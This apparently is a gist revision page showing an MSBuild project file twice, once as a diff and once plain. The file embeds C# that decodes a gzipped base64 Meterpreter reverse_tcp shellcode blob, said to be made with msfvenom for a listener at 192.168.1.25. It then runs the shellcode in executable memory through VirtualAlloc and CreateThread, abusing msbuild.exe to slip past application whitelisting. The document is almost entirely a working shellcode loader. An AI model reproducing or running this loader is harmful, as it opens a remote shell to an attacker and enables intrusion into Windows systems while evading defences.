dxflatline · July 7, 2017 19:04
diff --git a/msbuild_sc_alloc.csproj b/msbuild_sc_alloc.csproj
 <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 	<!-- Original work by https://gist.github.com/subTee -->
 	<!-- Run like C:\Windows\Microsoft.NET\Framework\v4.0.30319>msbuild c:\temp\msbuild_sc_alloc.csproj -->
 	<Target Name="Hello">
 		<FragmentExample />
 		<MeterExecute />
 	</Target>
  
 	<UsingTask TaskName="FragmentExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
 		<ParameterGroup/>
 		<Task>
 			<Using Namespace="System" />  
 			<Code Type="Fragment" Language="cs">
 			<![CDATA[
 				Console.WriteLine("Original work by https://gist.github.com/subTee");
 			]]>
 			</Code>
 		</Task>
 	</UsingTask>
 	
 	<UsingTask TaskName="MeterExecute" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
 		<ParameterGroup/>
 		<Task>
 			<Using Namespace="System" />
 			<Using Namespace="System.Reflection" />
 			<Code Type="Class" Language="cs">
 				<![CDATA[
 				
 				using System;
 				using System.IO;
 				using Microsoft.Build.Framework;
 				using Microsoft.Build.Utilities;
 				using System.IO.Compression;
 				using System.Runtime.InteropServices;
 				using System.Threading;
 				
 				public class MeterExecute :  Task, ITask
 				{
 					public override bool Execute()
 					{
 						IntPtr shellcodeProcessHandle = IntPtr.Zero;
 						// 
 						// CHANGE SHELLCODE HERE
 						// msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=54321 -f raw 2>/dev/null | gzip | base64 -w 0
 						//
 						String ShellCode_B64 = "H4sIAGvZX1kAA/vzoomBgSGh86nhgZTuAIPuIJ7uIJHuIg3+7V5qhv/X2CTWMOkoHDzPy3j80aeg8O4ggW4vm24fwYrHHowXA7sjFRgvd3tKPLby7DbpZrwG1ABWavGg9Btz7Q/rWpXSJxHdESqMl9O6eby7I2SAqlm6GS90uqioREcnRkYF/n8QHx/VLfS6NzbD2IiBIaO82Cg+JMOnXI39/9UdExgZGDSPhARkaDZkM/y/msWacWAFo2QGE8MVw85nAUDgAIQZr/jvP/h/dXqWQFh4xsylJYn/r7YeKOH678dR+uZFItBvWQxZLEApppsn4v9fbf7BUGfWbZblkMEgwMAQlsWQEbEk+On/q5ODsxjCgpFU1SpFZDA4gHQHZHDr8xv8vxqeUZrnCzQ9Lu4/j8rLwv///zMe1jxWevzw7g9bFwFNCv5/FQCF4lpQTQEAAA==";
 						//
 						//
 						Console.WriteLine("Started shellcode execution..");
 						byte[] ShellCode_gzip = Convert.FromBase64String(ShellCode_B64);
 						byte[] ShellCode_c = Decompress(ShellCode_gzip);
 						shellcodeProcessHandle = exec_shellcode(ShellCode_c);
 						WaitForSingleObject(shellcodeProcessHandle, 0xFFFFFFFF);
 						Console.WriteLine("Ended shellcode execution..");
 						return true;
 					}
 					
 					static byte[] Decompress(byte[] data)
 					{
 						using (var compressedStream = new MemoryStream(data))
 						using (var zipStream = new GZipStream(compressedStream, CompressionMode.Decompress))
 						using (var resultStream = new MemoryStream())
 						{
 							zipStream.CopyTo(resultStream);
 							return resultStream.ToArray();
 						}
 					}
 					
 					private static IntPtr exec_shellcode(byte[] shellcode)
 					{
 						UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 						Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
 						IntPtr hThread = IntPtr.Zero;
 						UInt32 threadId = 0;
 						IntPtr pinfo = IntPtr.Zero;
 						hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
 						return hThread;
 					}
 					private static UInt32 MEM_COMMIT = 0x1000;
 					private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
 					[DllImport("kernel32")]
 					private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
 					 UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
 					[DllImport("kernel32")]
 					private static extern IntPtr CreateThread(
 						UInt32 lpThreadAttributes,
 						UInt32 dwStackSize,
 						UInt32 lpStartAddress,
 						IntPtr param,
 						UInt32 dwCreationFlags,
 						ref UInt32 lpThreadId
 					);
 					[DllImport("kernel32")]
 					private static extern UInt32 WaitForSingleObject(
 						IntPtr hHandle,
 						UInt32 dwMilliseconds
 					);
 				}
 				
 				]]>
 			</Code>
 		</Task>
 	</UsingTask>
 </Project>
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- Original work by https://gist.github.com/subTee -->
	<!-- Run like C:\Windows\Microsoft.NET\Framework\v4.0.30319>msbuild c:\temp\msbuild_sc_alloc.csproj -->
	<Target Name="Hello">
	<FragmentExample />
	<MeterExecute />
	</Target>

	<UsingTask TaskName="FragmentExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<ParameterGroup/>
	<Task>
	<Using Namespace="System" />
	<Code Type="Fragment" Language="cs">
	<![CDATA[
	Console.WriteLine("Original work by https://gist.github.com/subTee");
	]]>
	</Code>
	</Task>
	</UsingTask>

	<UsingTask TaskName="MeterExecute" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<ParameterGroup/>
	<Task>
	<Using Namespace="System" />
	<Using Namespace="System.Reflection" />
	<Code Type="Class" Language="cs">
	<![CDATA[

	using System;
	using System.IO;
	using Microsoft.Build.Framework;
	using Microsoft.Build.Utilities;
	using System.IO.Compression;
	using System.Runtime.InteropServices;
	using System.Threading;

	public class MeterExecute : Task, ITask
	{
	public override bool Execute()
	{
	IntPtr shellcodeProcessHandle = IntPtr.Zero;
	//
	// CHANGE SHELLCODE HERE
	// msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=54321 -f raw 2>/dev/null \| gzip \| base64 -w 0
	//
	String ShellCode_B64 = "H4sIAGvZX1kAA/vzoomBgSGh86nhgZTuAIPuIJ7uIJHuIg3+7V5qhv/X2CTWMOkoHDzPy3j80aeg8O4ggW4vm24fwYrHHowXA7sjFRgvd3tKPLby7DbpZrwG1ABWavGg9Btz7Q/rWpXSJxHdESqMl9O6eby7I2SAqlm6GS90uqioREcnRkYF/n8QHx/VLfS6NzbD2IiBIaO82Cg+JMOnXI39/9UdExgZGDSPhARkaDZkM/y/msWacWAFo2QGE8MVw85nAUDgAIQZr/jvP/h/dXqWQFh4xsylJYn/r7YeKOH678dR+uZFItBvWQxZLEApppsn4v9fbf7BUGfWbZblkMEgwMAQlsWQEbEk+On/q5ODsxjCgpFU1SpFZDA4gHQHZHDr8xv8vxqeUZrnCzQ9Lu4/j8rLwv///zMe1jxWevzw7g9bFwFNCv5/FQCF4lpQTQEAAA==";
	//
	//
	Console.WriteLine("Started shellcode execution..");
	byte[] ShellCode_gzip = Convert.FromBase64String(ShellCode_B64);
	byte[] ShellCode_c = Decompress(ShellCode_gzip);
	shellcodeProcessHandle = exec_shellcode(ShellCode_c);
	WaitForSingleObject(shellcodeProcessHandle, 0xFFFFFFFF);
	Console.WriteLine("Ended shellcode execution..");
	return true;
	}

	static byte[] Decompress(byte[] data)
	{
	using (var compressedStream = new MemoryStream(data))
	using (var zipStream = new GZipStream(compressedStream, CompressionMode.Decompress))
	using (var resultStream = new MemoryStream())
	{
	zipStream.CopyTo(resultStream);
	return resultStream.ToArray();
	}
	}

	private static IntPtr exec_shellcode(byte[] shellcode)
	{
	UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
	IntPtr hThread = IntPtr.Zero;
	UInt32 threadId = 0;
	IntPtr pinfo = IntPtr.Zero;
	hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
	return hThread;
	}
	private static UInt32 MEM_COMMIT = 0x1000;
	private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
	[DllImport("kernel32")]
	private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
	UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
	[DllImport("kernel32")]
	private static extern IntPtr CreateThread(
	UInt32 lpThreadAttributes,
	UInt32 dwStackSize,
	UInt32 lpStartAddress,
	IntPtr param,
	UInt32 dwCreationFlags,
	ref UInt32 lpThreadId
	);
	[DllImport("kernel32")]
	private static extern UInt32 WaitForSingleObject(
	IntPtr hHandle,
	UInt32 dwMilliseconds
	);
	}

	]]>
	</Code>
	</Task>
	</UsingTask>
	</Project>